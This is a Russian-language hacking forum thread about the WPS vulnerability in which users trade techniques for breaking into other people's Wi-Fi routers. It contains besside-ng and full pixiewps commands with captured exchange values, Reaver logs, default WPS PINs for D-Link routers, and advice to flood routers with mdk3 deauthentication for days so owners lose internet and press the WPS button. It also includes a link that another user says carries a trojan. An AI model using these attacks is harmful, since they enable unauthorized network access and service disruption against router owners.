Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. Kevin Shindel

    Kevin Shindel Elder - Старейшина

    Joined:
    24 May 2015
    Messages:
    1,011
    Likes Received:
    1,195
    Reputations:
    62
    Ребята подскажите где проскакивала инфа как узнать есть ли фильтр по маку или нет...
    Есть пасс от точки пытаюсь зайти но не пускает, но и не пишет что пароль не верный...
    Как узнать стоит фильтр по маку или просто ТД заглючила...
    Спасибо.
     
  2. djamv

    djamv Member

    Joined:
    16 Oct 2012
    Messages:
    129
    Likes Received:
    45
    Reputations:
    0
    besside-ng -b МАК_точки monX
    Оно поймает рукопожатие и, если есть фильтр по маку, запишет разрешенный мак в лог.
     
  3. roman921

    roman921 Member

    Joined:
    24 May 2015
    Messages:
    316
    Likes Received:
    22
    Reputations:
    0
    А tp841n реально перезагрузить ? Ривером ломал, но он залочился после 10 попыток где-то. Делаю атаки с мдк3 разные вместе, но не перезагружается.
     
  4. atlas28

    atlas28 Active Member

    Joined:
    23 May 2015
    Messages:
    224
    Likes Received:
    173
    Reputations:
    1
    Практически всегда на кинетиках со включенным WPS получалось применить pixiewps атаку, но тут наткнулся на один такой, на котором не находит пин. Уязвимость пофиксили?
    Code:
    pixiewps -e 08:5b:3d:a7:0c:b6:62:31:81:8c:da:24:a8:15:08:1c:a9:7e:9c:23:aa:2e:34:38:1f:db:33:81:f4:ba:78:b6:fa:d1:4d:0a:4a:67:b6:b5:f0:97:86:46:29:a8:2a:e7:11:d5:18:dd:aa:88:e2:6b:f0:70:f9:6f:2e:64:58:59:3b:d7:8d:40:2b:61:c6:cf:e4:5c:4e:73:a1:b9:37:13:7f:82:c3:b0:7d:f4:da:37:5d:71:21:32:35:ee:4c:07:9a:cd:81:90:5b:c8:d4:e5:14:89:21:c2:86:bd:b2:10:57:8b:53:0c:5d:cf:e1:9b:3e:7b:56:59:e0:dc:98:f9:53:8e:9f:6a:5a:ce:37:34:a0:02:3a:e2:73:22:61:41:44:d4:e9:4f:be:52:68:75:6a:cb:a5:d8:3e:79:67:c3:09:8c:66:bc:81:d9:a8:6a:fb:72:df:0e:12:08:28:48:78:c5:3d:79:44:b6:03:85:72:80:aa:ba:72:61:be:17 -r c1:37:b0:8c:ca:18:95:10:e3:bd:22:2f:94:a4:5e:d9:6e:1b:ba:a9:74:9a:0d:13:54:2a:95:1d:5e:c3:ae:a6:d8:17:91:90:98:e8:21:44:88:a3:f3:9a:c6:10:08:5c:98:26:2f:0a:23:dc:9f:05:28:ba:fe:9f:22:e9:54:9f:a2:78:53:0e:80:ff:c5:37:5e:41:54:ed:60:97:fc:9d:5a:20:21:c1:17:2d:6a:4e:fe:50:8f:f0:9c:97:0e:f1:96:ab:98:38:0c:e1:f0:7a:d6:af:09:e8:10:7d:9a:f5:72:ad:e1:7d:c7:34:13:2f:0f:c8:84:36:11:73:67:12:98:e2:90:3c:f9:d9:98:44:01:f2:0f:ac:9b:af:8b:b2:62:ad:c1:ff:f8:09:2a:ef:03:5a:75:fc:0f:d2:23:06:00:17:6c:54:79:a6:51:ec:d5:68:b8:5f:af:6e:29:d6:e9:6c:b0:79:b0:bf:1b:f6:dc:5a:31:76:bb:fd:f4:35 -s 1c:ea:b3:b1:66:39:68:c8:45:d4:dd:c0:6a:11:c8:49:09:32:59:3a:8a:25:28:a5:7c:0a:20:15:60:14:fd:79 -z be:39:52:82:53:75:10:16:1f:69:77:27:37:ed:02:49:a7:0d:ed:cc:9b:5d:40:7e:36:8c:3d:1a:84:5b:3e:82 -a e9:73:52:c3:4f:b1:40:9f:fb:cd:d3:f2:0f:ad:9f:3c:0a:65:95:06:41:85:63:a5:76:e1:50:2e:6f:32:75:ce -n a1:0a:e8:05:59:3b:32:59:a9:f1:6a:5e:8d:2a:2b:f4
    
    pixiewps -e d1:79:07:73:0f:3b:79:82:97:95:95:5f:6f:11:ab:6b:3a:61:5b:79:6a:50:e3:b7:bc:be:cc:c8:a0:f8:dd:c8:d8:90:38:77:13:dd:d3:6b:1d:d3:07:74:f9:49:2e:60:f6:c0:8e:c3:60:65:8f:a8:6e:2c:9c:a3:d7:74:a0:9d:0d:c7:cf:64:13:47:45:1c:88:21:3e:12:01:c3:a1:1b:a4:c7:d2:f0:b6:2d:9c:f1:e1:4d:c4:c9:b7:78:6c:6d:81:36:33:94:65:ec:8a:b0:59:c1:3a:6b:e5:b9:c2:18:aa:58:57:0c:36:3e:3d:a3:cf:17:be:f4:30:12:ea:64:ca:7a:a6:32:32:fb:98:0f:eb:2b:06:f0:d7:77:54:2b:10:f0:ea:fe:2f:58:c3:04:aa:c7:a6:ba:a1:56:c1:5f:73:ad:be:37:1b:25:85:9b:0b:46:1b:b7:4b:85:22:6e:bb:fb:72:f1:d0:fb:aa:3b:b7:5b:e3:30:b7:cb:9d:0b -r 37:52:87:46:0d:43:a3:71:0b:68:e4:52:25:d9:93:22:3b:4e:db:a2:da:53:cf:5a:1c:9f:ae:c5:d8:5a:73:24:f6:09:01:b4:57:f8:ce:99:1c:e3:d9:8e:19:34:8c:11:9f:89:82:d0:23:ff:7c:35:7f:18:fb:e4:f9:32:04:b4:17:8c:e5:e1:3a:41:b4:54:88:02:2e:42:09:23:9e:9a:8d:fd:2c:4e:49:32:60:c4:49:af:05:22:f6:c5:8d:82:7e:d7:7d:6e:54:ed:2f:59:d1:3c:ac:e1:06:40:41:08:36:b0:e7:c4:5d:b6:c4:33:32:71:99:7d:b9:bd:c9:52:d3:22:a8:0f:5e:51:61:b7:27:99:81:bd:4a:b4:fb:54:bf:91:11:df:4f:b4:a7:87:52:cb:fd:53:7a:d7:14:ce:7b:98:d6:e3:2e:e4:ae:67:4a:74:9b:07:96:d9:46:a6:19:0c:a6:63:68:db:cf:59:75:d8:0e:b1:7d:4a:47:62 -s ea:c3:41:08:70:0b:4e:44:3a:39:1a:f0:f6:ab:95:33:ee:26:e0:50:ac:5d:2b:61:69:79:24:69:e5:71:8d:6b -z 80:0d:b7:c1:e6:e5:03:c1:49:53:94:f7:b1:95:dd:62:56:a7:ce:25:9c:66:95:6c:0c:a2:bf:9a:18:ff:0c:31 -a 64:48:94:af:66:93:f1:6f:aa:d6:bf:33:92:0b:e0:9a:a0:9c:be:36:a5:bc:15:80:e5:cb:40:2d:62:60:88:f5 -n 38:52:3f:cf:bc:bf:0b:d8:33:4d:23:cf:ac:e3:c4:00
    
     
  5. Sves

    Sves Active Member

    Joined:
    7 Dec 2015
    Messages:
    33
    Likes Received:
    186
    Reputations:
    1
    Аналогично, недавно появился, скорее всего с последней прошивкой:
    Code:
    # Generated by Reaver 1.5.2
    # Target BSSID: EC:43:F6:XX:XX:XX
    # Target MANUFACTURER: ZyXEL
    # Target MODEL: Keenetic
    # Target MODEL NUMBER: RT2860
    
    #-----Full command-----#
    pixiewps -e 29:8a:9d:f6:75:0b:52:c0:4e:2c:2f:a9:66:c7:ac:b4:d1:87:f5:f0:1d:f3:ef:c4:54:73:4d:74:76:95:c4:16:fa:f3:d0:0a:96:72:34:ce:d4:fc:0d:9a:0e:90:d3:98:7c:0e:04:0c:b1:6e:e7:cd:26:42:e9:aa:1a:00:c5:67:de:3b:0c:4c:8f:b9:72:b9:86:82:17:61:cd:0d:77:c2:08:f1:57:99:83:a3:1b:7d:f4:4b:06:0d:80:88:45:4b:ba:9e:8e:fc:6d:95:f3:92:ff:10:76:7b:37:f6:f5:22:41:aa:57:97:3a:fc:ee:90:cb:f7:9d:1f:3a:4b:93:2d:69:22:0e:4e:ae:52:cb:bd:7b:5f:be:30:b6:66:a0:b7:d1:3d:a9:e7:3f:f9:d1:08:bc:74:93:b9:aa:54:f4:3f:4f:a2:5b:3e:14:65:2f:c2:7a:95:b0:59:97:ce:50:a3:ad:8a:c5:a0:2c:94:0a:54:22:6d:c0:8d:84:49:17:35 -r 02:7a:09:d8:80:60:97:ea:6b:93:3c:d0:12:a4:18:2b:df:ac:73:9f:d9:c2:da:f1:9a:04:f1:df:63:7a:e3:a0:e7:b0:08:68:e1:d1:ef:06:78:a6:a5:00:d2:70:82:f6:16:ff:3b:0e:35:e4:be:d4:b9:16:e1:fa:3b:58:a7:42:4d:a4:c2:58:45:86:e9:7b:ca:c8:fe:e7:dc:20:1f:14:0e:37:41:3e:f5:fa:f9:ed:f2:6b:69:ca:7e:1a:7e:66:ad:a7:18:d6:54:cd:61:cf:37:c4:e4:a4:60:3d:25:fc:4b:4a:60:a2:24:71:81:23:f6:3f:6f:5a:60:5a:00:9f:d0:2d:ca:31:18:2a:41:98:c6:8e:40:02:f1:c4:ba:2a:90:39:83:bd:5f:f1:64:39:fa:54:5b:48:ae:e3:39:0f:5e:0b:8e:e6:88:e4:b8:d8:dc:57:38:ab:4d:e1:fe:d9:65:8b:69:8a:0b:ea:39:d7:d1:7d:fa:85:48:3a:77:00 -s 05:c4:84:00:93:ef:1a:11:ee:4c:d2:db:22:90:57:0e:64:30:cd:e4:b8:c7:cb:d5:5a:da:f0:1b:7a:5b:88:e6 -z 98:8d:ac:e1:d4:6b:d7:71:27:ab:0a:72:49:88:6a:99:dd:d0:e9:ca:fc:f8:77:41:c2:ec:aa:b1:93:67:be:ec -a 06:c2:f0:11:1f:18:b4:b3:ac:61:65:bc:de:0e:da:db:4e:6b:25:cb:9f:e1:ea:c9:6f:80:83:9b:5b:bb:ef:2f -n 15:a6:a2:73:d0:e8:bf:ad:a7:ce:c4:e2:ba:c6:fa:87
    Ранее был в поле видимости похожий, но он все-таки поддался с 30-50 попыток:
    Code:
    # Generated by Reaver 1.5.2
    # Target BSSID: 5C:F4:AB:ХХ:ХХ:ХХ
    # Target MANUFACTURER: ZyXEL
    # Target MODEL: Keenetic
    # Target MODEL NUMBER: RT2860
     
  6. atlas28

    atlas28 Active Member

    Joined:
    23 May 2015
    Messages:
    224
    Likes Received:
    173
    Reputations:
    1
    Да, в моем случае роутер тоже новый, только недавно появился. Насчет 30-50 попыток попробую затестить, просто WPS отключается (именно отключается, а не лочится) после нескольких неудачных попыток. Кстати говоря, раньше тоже не всегда с первой попытки пин находился. Частенько со 2-3 только.
     
  7. atlas28

    atlas28 Active Member

    Joined:
    23 May 2015
    Messages:
    224
    Likes Received:
    173
    Reputations:
    1
    Закидал deauth пакетами и добился того, чтобы его еще пару раз ребутнули. В итоге pixiewps атака проканала. Интересная картина получается.

    А самое смешное, что это оказался обычный 24-bit PIN
     
  8. farkos

    farkos Member

    Joined:
    28 Sep 2016
    Messages:
    59
    Likes Received:
    92
    Reputations:
    0
    картина может быть обычной если учитывать возможные состояния исследуемого роутера. может у самого пользователя работает кое как по ряду причин, проблемы с питанием и т.д.
     
  9. Anton91x

    Anton91x Member

    Joined:
    15 May 2015
    Messages:
    18
    Likes Received:
    8
    Reputations:
    0
    Если отключается, значит старая прошивка 2.00-2.03
    Лочится они начинают от 2.04 и выше
     
  10. Anton91x

    Anton91x Member

    Joined:
    15 May 2015
    Messages:
    18
    Likes Received:
    8
    Reputations:
    0
    Ну это как то не серьезно
    А долбить его mdk3 в это время вам религия не позволяет?
    Включить атаку дня на два
    У хозяина пропадет интернет
    Тогда уж точно нажмет, будет давить на все кнопки
    Так можно взломать любой роутер с включенным wps
    Да и зачем 00000000
    Просто из под винды 7,8 или 10 пытаемся подключиться и ждем пока нажмут
     
    #3630 Anton91x, 10 Nov 2016
    Last edited: 11 Nov 2016
  11. Anton91x

    Anton91x Member

    Joined:
    15 May 2015
    Messages:
    18
    Likes Received:
    8
    Reputations:
    0
    Я как то взламывал D-Link DSL-2640U и тоже от провайдера ростелеком, по-моему pin начинался на 38, но я его не помню, попробуйте подобрать 3 и 4 цифру
    Попробуйте еще 31957199, 21464065
     
    DSL2650NRU likes this.
  12. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,684
    Likes Received:
    10,039
    Reputations:
    124
    В том посте речь шла о моделе роутера, который в принципе не принимает пин коды, только при нажатой кнопке WPS принимает код 00000000.
    От долбёжки маловероятно, что кто-то нажмёт кнопку, только перезагружать будут. Сужу по опыту.
    Это что-то новенькое.
     
  13. atlas28

    atlas28 Active Member

    Joined:
    23 May 2015
    Messages:
    224
    Likes Received:
    173
    Reputations:
    1
    v2.02(AAKV.1)A4 была в моем случае
     
  14. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,684
    Likes Received:
    10,039
    Reputations:
    124
    Само собой... но мы тут чаще обсуждаем общие случаи, когда физического доступа к кнопке нет. :D
     
    Alexmeh and Triton_Mgn like this.
  15. Triton_Mgn

    Triton_Mgn Elder - Старейшина

    Joined:
    6 Jul 2015
    Messages:
    3,642
    Likes Received:
    5,692
    Reputations:
    51
    Vfrcbv
    Максимум рубильник:)
     
  16. basil1949

    basil1949 New Member

    Joined:
    12 May 2012
    Messages:
    75
    Likes Received:
    4
    Reputations:
    0
    Кто-нибудь сталкивался с точкой доступа на Androide (имя роутера Android_4816, так показывает программа WiFiInfoView). WPS присутствует. Можно ли её сломать при помощи WPS-инструментария. У меня не получилось. В лучшем случае всё заканчивалось бесконечным повторением...
     
  17. DSL2650NRU

    DSL2650NRU Well-Known Member

    Joined:
    12 Apr 2016
    Messages:
    466
    Likes Received:
    303
    Reputations:
    1
    Спасибо за ответ. Эти пины я тоже уже попробовал. Я нашел только одну точку с похожим маком в базе 3wifi и ее wps пин ни на какие алгоритмы не похож и не статический. Наверно росийские инженеры длинка читают античат :)
     
  18. mazik

    mazik Member

    Joined:
    5 Jan 2016
    Messages:
    210
    Likes Received:
    51
    Reputations:
    0
    "КАРТИНКИ РОУТЕРОВ"

    парсер картинок Google по ключевому слову ( 170кб -маленькая)
    http://rgho.st/7QfJVVCYm
    Роутеры.
    Девочки.
    Любые ФОТО.
     
  19. Anton91x

    Anton91x Member

    Joined:
    15 May 2015
    Messages:
    18
    Likes Received:
    8
    Reputations:
    0
    Я не знаю что они там читают
    Я скачивал инструкции по настройке роутеров DSL-2640U, DSL-2750U, DSL-2500U и др.
    С официального сайта D-Link
    Там все в картинках (скриншоты веб морды)
    Там видны пины. И эти пины подходят к Длинкам
    Не думал что разработчики настолько...
     
  20. Anton91x

    Anton91x Member

    Joined:
    15 May 2015
    Messages:
    18
    Likes Received:
    8
    Reputations:
    0
    СПАМ!
    ПО ССЫЛКЕ ТРОЯН
     
Loading...